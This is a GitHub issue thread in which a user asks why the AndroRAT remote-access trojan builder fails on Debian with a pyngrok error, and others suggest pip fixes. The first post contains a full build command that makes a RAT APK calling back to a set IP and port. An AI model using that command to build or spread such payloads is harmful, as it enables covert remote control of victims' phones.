### ISSUE TITLE
AndroRAT doesn't work on debian.

### ISSUE THREAD

**Issue by Anonymous1503** [karma9874/AndroRAT#279]
Hi Neeraj 

![IMG_20230617_152832](https://github.com/karma9874/AndroRAT/assets/135541280/ec2c6890-c570-427f-b55b-31bc864c052a)
Everytime I do python3 androRAT.py --build -i 10.220.128.97 -p 4444 -o test.apk it doesn't work bhai

It tells me to install pyngrok but requirements Already satisfied me kuch galat kar raha hu kya?

**Comment by Anonymous1503** [comment]
![IMG_20230617_163505](https://github.com/karma9874/AndroRAT/assets/135541280/a4c7f12f-1b75-48b2-bff1-3895c02ac09b)

**Comment by Anonymous1503** [comment]
![Uploading IMG_20230617_163633.jpg…]()

**Comment by Anonymous1503** [comment]
![IMG_20230617_163633](https://github.com/karma9874/AndroRAT/assets/135541280/d3c968ec-cd18-4fba-bb7c-ea1230adb34e)
Here's the issue

**Comment by qcoderx** [comment]
did you try running "pip3" instead of just pip, like the info asked you to???

**Comment by oendnsk675** [comment]
i think you should try using just pip, or maybe your not currently install python 3 on your debian
